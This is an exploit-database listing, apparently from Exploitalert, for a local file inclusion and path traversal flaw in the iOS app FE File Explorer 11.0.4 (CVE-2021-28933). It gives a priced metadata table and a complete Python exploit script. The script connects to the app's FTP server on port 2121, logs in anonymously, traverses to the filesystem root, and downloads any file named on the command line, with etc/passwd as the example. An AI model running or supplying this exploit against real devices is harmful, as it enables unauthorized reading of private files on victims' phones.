Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-28933 | CWE-98 | $3,000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Administrator | High | Local | 2022-09-07 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N | 0.25 | 0.5 |
# Exploit Title: FE File Explorer 11.0.4 Local File inclusion # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/fe-file-explorer-file-manager/id510282524 # Version: 11.0.4 # Tested on: iPhone ios 15.6 from ftplib import FTP import argparse help = " FE File Explorer Local File inclusion" parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File To Open eg: etc/passwd") args = parser.parse_args() ip = args.target port = 2121 # Default Port files = args.file ftpConnection = FTP() ftpConnection.connect(host=ip, port=port) ftpConnection.login(); def downloadFile(): ftpConnection.cwd('/../../../../../../../../../../../../../../../../') ftpConnection.retrbinary(f"RETR {files}", open('data.txt', 'wb').write) ftpConnection.close() file = open('data.txt', 'r') print (f"[***] The contents of {files}\n") print (file.read()) downloadFile()
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.